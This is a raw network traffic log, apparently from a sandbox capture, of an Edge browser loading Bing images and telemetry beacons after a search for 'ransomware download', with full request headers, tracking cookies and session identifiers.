cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
etag: 0x8DBDF5953284A9A
cache-control: public, no-transform, max-age=40362
expires: Fri, 01 Mar 2024 00:51:06 GMT
akamai-grn: 0.87777b5c.1709213904.168939a3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5521
content-type: image/png
content-md5: dspgs9YNVvIOGWfK/zL25w==
x-ms-request-id: 961356ca-501e-00a9-5b3a-548458000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b3156db
-
GEThttps://www.bing.com/aes/c.gif?type=mv&tids=71,73&rg=1d03bcc77b2d472484cf2e8fec86c32c&reqver=1.0msedge.exeRemote address:92.123.128.152:443RequestGET /aes/c.gif?type=mv&tids=71,73&rg=1d03bcc77b2d472484cf2e8fec86c32c&reqver=1.0 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E0A0B30DF47044C591135D6E5BDF647D Ref B: LON04EDGE0608 Ref C: 2024-02-29T15:31:50Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220710.b3156f3
-
GEThttps://www.bing.com/aes/c.gif?type=mv&tids=77,79,81,83&rg=1d03bcc77b2d472484cf2e8fec86c32c&reqver=1.0msedge.exeRemote address:92.123.128.152:443RequestGET /aes/c.gif?type=mv&tids=77,79,81,83&rg=1d03bcc77b2d472484cf2e8fec86c32c&reqver=1.0 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
etag: 0x8DBBF5ACB7D1C95
cache-control: public, no-transform, max-age=388735
expires: Mon, 04 Mar 2024 03:50:40 GMT
akamai-grn: 0.b8777b5c.1709135505.35430b2
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1138
content-type: image/svg+xml
content-md5: OkYBZZbsHlmImufLOqd1+w==
x-ms-request-id: 83e8f588-e01e-0093-286f-669e20000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
date: Thu, 29 Feb 2024 15:31:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220711.b3159e6
-
Remote address:92.123.128.152:443RequestGET /rp/heOXyRFzkLjRIgrn2jdcirMbXok.png HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
etag: 0x8DBBF5ACB7D6BB2
akamai-grn: 0.47281102.1708595759.698efd23
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1140
content-type: image/svg+xml
content-md5: h72kc4ln8WnRidauN/oSRw==
x-ms-request-id: 99e9d7eb-301e-005b-129d-5d7c11000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=403873
expires: Sat, 02 Mar 2024 23:55:45 GMT
akamai-grn: 0.59281102.1709019872.7b072e1
timing-allow-origin: *
date: Thu, 29 Feb 2024 15:31:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220711.b3159e7
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.ClientInst%22,%22FID%22:%22CI%22,%22Name%22:%22ResizeObserverLimit%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.ClientInst%22,%22FID%22:%22CI%22,%22Name%22:%22ResizeObserverLimit%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F8BAC1B9D1B84D89A9BA445859C3D9C4 Ref B: LTSEDGE1112 Ref C: 2024-02-29T15:31:51Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220711.b315a96
-
Remote address:92.123.128.152:443RequestGET /rp/0Kv2EbGZU7NV-wbo0XwhxQSY_1k.svg HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 835D56E1C44B46B19AC639E2897A63B3 Ref B: LON04EDGE0717 Ref C: 2024-02-29T15:31:51Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220711.b315a9a
-
Remote address:92.123.128.152:443RequestGET /rp/v6T2hhKPV0ncl46oF7sbuo4xFNE.svg HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A1E2C458DADE49BCBBA9573477497AEC Ref B: LON04EDGE0713 Ref C: 2024-02-29T15:31:51Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:51 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220711.b315a97
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220707952%2C%22Name%22%3A%22BindedScrollEvents%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22CustomData%22%3A%22%7B%5C%22metrics%5C%22%3A%7B%5C%22ChatInitialUIReady%5C%22%3A-1%7D%2C%5C%22convId%5C%22%3Anull%2C%5C%22Tone%5C%22%3A%5C%22Balanced%5C%22%2C%5C%22IsCCP%5C%22%3Afalse%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220707996%2C%22Name%22%3A%22PerformanceData%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220708066%2C%22Name%22%3A%22GAMV2.RenderShareCommonControlSuccess%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220708066%2C%22Name%22%3A%22GAMV2.InitShareCommonControl%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708561%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220707952%2C%22Name%22%3A%22BindedScrollEvents%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22CustomData%22%3A%22%7B%5C%22metrics%5C%22%3A%7B%5C%22ChatInitialUIReady%5C%22%3A-1%7D%2C%5C%22convId%5C%22%3Anull%2C%5C%22Tone%5C%22%3A%5C%22Balanced%5C%22%2C%5C%22IsCCP%5C%22%3Afalse%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220707996%2C%22Name%22%3A%22PerformanceData%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220708066%2C%22Name%22%3A%22GAMV2.RenderShareCommonControlSuccess%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220708066%2C%22Name%22%3A%22GAMV2.InitShareCommonControl%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220708561%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709
ResponseHTTP/2.0 200
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 65e0a367b0444338a4c742b9594b671b
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-aIGLZstLCcFwcH620dDY3OTeupdMYznDjJvnkFVOAbw='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 2A725819744C4931AC4957A8BC4D3104 Ref B: LON04EDGE0916 Ref C: 2024-02-29T15:31:51Z
date: Thu, 29 Feb 2024 15:31:51 GMT
